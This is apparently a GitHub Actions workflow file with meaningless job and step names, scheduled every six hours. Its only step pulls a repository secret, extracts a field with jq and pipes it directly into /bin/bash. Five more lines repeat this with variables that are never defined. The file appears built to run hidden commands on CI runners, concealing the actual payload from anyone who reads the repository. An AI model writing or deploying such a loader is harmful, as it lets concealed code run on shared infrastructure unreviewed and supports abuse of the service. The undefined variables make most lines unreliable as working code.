name: wangchongtong9527

on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'

jobs:  # 5004
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangchongtong9527
        env:
          ly381: ${{ secrets.ly381 }}
        run: |
          echo $ly381 | jq -r .kdmrf5 | /bin/bash
          echo $j09759 | jq -r .c3 | /bin/bash
          echo $w7615 | jq -r .po5913 | /bin/bash
          echo $i591 | jq -r .rq02 | /bin/bash
          echo $nsbbo6904 | jq -r .osl20 | /bin/bash
          echo $yehau01574 | jq -r .i9134 | /bin/bash

